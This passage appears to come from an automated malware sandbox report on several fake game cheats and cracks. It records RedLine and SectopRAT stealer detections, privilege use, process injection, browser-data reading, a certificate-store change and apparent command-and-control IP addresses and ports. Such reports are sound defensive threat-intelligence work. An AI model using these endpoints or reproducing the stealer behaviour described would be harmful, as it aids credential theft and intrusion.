| N/A | ip-api.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1848 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | C:\Windows\system32\WerFault.exe |
| PID 1848 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | C:\Windows\system32\WerFault.exe |
| PID 1848 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1848 -s 1400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
Files
memory/1848-0-0x000007FEF6033000-0x000007FEF6034000-memory.dmp
memory/1848-1-0x0000000000F20000-0x0000000000F30000-memory.dmp
memory/1848-2-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp
memory/1848-3-0x000007FEF6033000-0x000007FEF6034000-memory.dmp
memory/1848-4-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp
memory/1848-5-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20241010-en
Max time kernel
134s
Max time network
152s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2116 set thread context of 2156 | N/A | C:\Users\Admin\AppData\Local\Temp\Installer.exe | C:\Users\Admin\AppData\Local\Temp\Installer.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\Installer.exe
C:\Users\Admin\AppData\Local\Temp\Installer.exe
Network
| Country | Destination | Domain | Proto |
| FI | 95.217.248.44:11695 | tcp | |
| FI | 95.217.248.44:11695 | tcp | |
| FI | 95.217.248.44:11695 | tcp | |
| FI | 95.217.248.44:11695 | tcp | |
| FI | 95.217.248.44:11695 | tcp | |
| FI | 95.217.248.44:11695 | tcp |
Files
memory/2116-0-0x0000000074DCE000-0x0000000074DCF000-memory.dmp
memory/2116-1-0x0000000000D20000-0x0000000000E32000-memory.dmp
memory/2116-2-0x0000000074DC0000-0x00000000754AE000-memory.dmp
memory/2116-3-0x0000000000900000-0x0000000000922000-memory.dmp
memory/2156-8-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2156-6-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2116-10-0x0000000074DC0000-0x00000000754AE000-memory.dmp
memory/2156-9-0x0000000074DC0000-0x00000000754AE000-memory.dmp
memory/2156-4-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2156-11-0x0000000074DC0000-0x00000000754AE000-memory.dmp
memory/2156-12-0x0000000074DC0000-0x00000000754AE000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
142s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/4772-0-0x0000000074AFE000-0x0000000074AFF000-memory.dmp
memory/4772-1-0x00000000002D0000-0x0000000000374000-memory.dmp
memory/4772-2-0x0000000004CF0000-0x0000000004D66000-memory.dmp
memory/4772-3-0x0000000002730000-0x000000000274E000-memory.dmp
memory/4772-4-0x0000000074AF0000-0x00000000752A0000-memory.dmp
memory/4772-5-0x0000000074AFE000-0x0000000074AFF000-memory.dmp
memory/4772-6-0x0000000074AF0000-0x00000000752A0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2068 set thread context of 4612 | N/A | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | C:\Users\Admin\AppData\Local\Temp\Installer2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
C:\Users\Admin\AppData\Local\Temp\Installer2.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| NL | 185.92.73.140:80 | 185.92.73.140 | tcp |
| NL | 185.92.73.140:443 | tcp | |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.73.92.185.in-addr.arpa | udp |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| NL | 185.92.73.140:443 | tcp | |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp | |
| NL | 185.92.73.140:443 | tcp |
Files
memory/2068-0-0x000000007474E000-0x000000007474F000-memory.dmp
memory/2068-1-0x00000000002B0000-0x0000000000324000-memory.dmp
memory/2068-2-0x0000000005240000-0x00000000057E4000-memory.dmp
memory/2068-3-0x0000000004D30000-0x0000000004DC2000-memory.dmp
memory/2068-4-0x0000000004ED0000-0x0000000004EDA000-memory.dmp
memory/2068-5-0x0000000074740000-0x0000000074EF0000-memory.dmp
memory/2068-6-0x0000000004FA0000-0x0000000004FC2000-memory.dmp
memory/4612-7-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4612-11-0x0000000074740000-0x0000000074EF0000-memory.dmp
memory/4612-9-0x00000000057B0000-0x0000000005DC8000-memory.dmp
memory/4612-12-0x00000000052B0000-0x00000000052EC000-memory.dmp
memory/2068-13-0x0000000074740000-0x0000000074EF0000-memory.dmp
memory/4612-10-0x0000000005210000-0x0000000005222000-memory.dmp
memory/4612-14-0x00000000052F0000-0x000000000533C000-memory.dmp
memory/4612-15-0x0000000074740000-0x0000000074EF0000-memory.dmp
memory/4612-16-0x0000000005560000-0x000000000566A000-memory.dmp
memory/4612-17-0x0000000074740000-0x0000000074EF0000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20241010-en
Max time kernel
137s
Max time network
156s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2124 set thread context of 2220 | N/A | C:\Users\Admin\AppData\Local\Temp\launcher.exe | C:\Users\Admin\AppData\Local\Temp\launcher.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\launcher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\launcher.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\launcher.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
C:\Users\Admin\AppData\Local\Temp\launcher.exe
C:\Users\Admin\AppData\Local\Temp\launcher.exe
Network
| Country | Destination | Domain | Proto |
| DE | 3.68.106.170:59223 | tcp | |
| DE | 3.68.106.170:59223 | tcp | |
| DE | 3.68.106.170:59223 | tcp | |
| DE | 3.68.106.170:59223 | tcp | |
| DE | 3.68.106.170:59223 | tcp | |
| DE | 3.68.106.170:59223 | tcp |
Files
memory/2124-0-0x0000000074C6E000-0x0000000074C6F000-memory.dmp
memory/2124-1-0x0000000000210000-0x0000000000274000-memory.dmp
memory/2124-2-0x0000000074C60000-0x000000007534E000-memory.dmp
memory/2220-6-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2220-13-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2220-11-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2220-14-0x0000000074C60000-0x000000007534E000-memory.dmp
memory/2220-9-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2220-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2220-5-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2124-15-0x0000000074C60000-0x000000007534E000-memory.dmp
memory/2220-3-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2220-4-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2220-16-0x0000000074C60000-0x000000007534E000-memory.dmp
memory/2220-17-0x0000000074C60000-0x000000007534E000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"
Network
Files
memory/2272-0-0x0000000074D6E000-0x0000000074D6F000-memory.dmp
memory/2272-1-0x0000000000A50000-0x0000000000AF4000-memory.dmp
memory/2272-2-0x0000000074D60000-0x000000007544E000-memory.dmp
memory/2272-3-0x0000000074D6E000-0x0000000074D6F000-memory.dmp
memory/2272-4-0x0000000074D60000-0x000000007544E000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
144s
Max time network
119s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nixware crack.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nixware crack.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\nixware crack.exe
"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
140s
Max time network
144s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp |
Files
memory/2336-1-0x0000000002D90000-0x0000000002DB2000-memory.dmp
memory/2336-2-0x0000000004BB0000-0x0000000004BD0000-memory.dmp
memory/2336-3-0x0000000000400000-0x0000000002C86000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
151s
Command Line
Signatures
Reads user/profile data of web browsers
Browser Information Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe
"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| NL | 185.182.82.35:4420 | tcp | |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| NL | 185.182.82.35:4420 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| NL | 185.182.82.35:4420 | tcp | |
| US | 8.8.8.8:53 | 99.208.201.84.in-addr.arpa | udp |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp |
Files
memory/2396-0-0x00007FFC7E8E3000-0x00007FFC7E8E5000-memory.dmp
memory/2396-1-0x0000000000B00000-0x0000000000B2A000-memory.dmp
memory/2396-2-0x00007FFC7E8E0000-0x00007FFC7F3A1000-memory.dmp
memory/2396-29-0x000000001E3D0000-0x000000001E592000-memory.dmp
memory/2396-37-0x000000001ECA0000-0x000000001ED16000-memory.dmp
memory/2396-53-0x000000001F7D0000-0x000000001F820000-memory.dmp
memory/2396-57-0x0000000020470000-0x0000000020998000-memory.dmp
memory/2396-58-0x00007FFC7E8E3000-0x00007FFC7E8E5000-memory.dmp
memory/2396-59-0x00007FFC7E8E0000-0x00007FFC7F3A1000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240729-en
Max time kernel
144s
Max time network
136s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
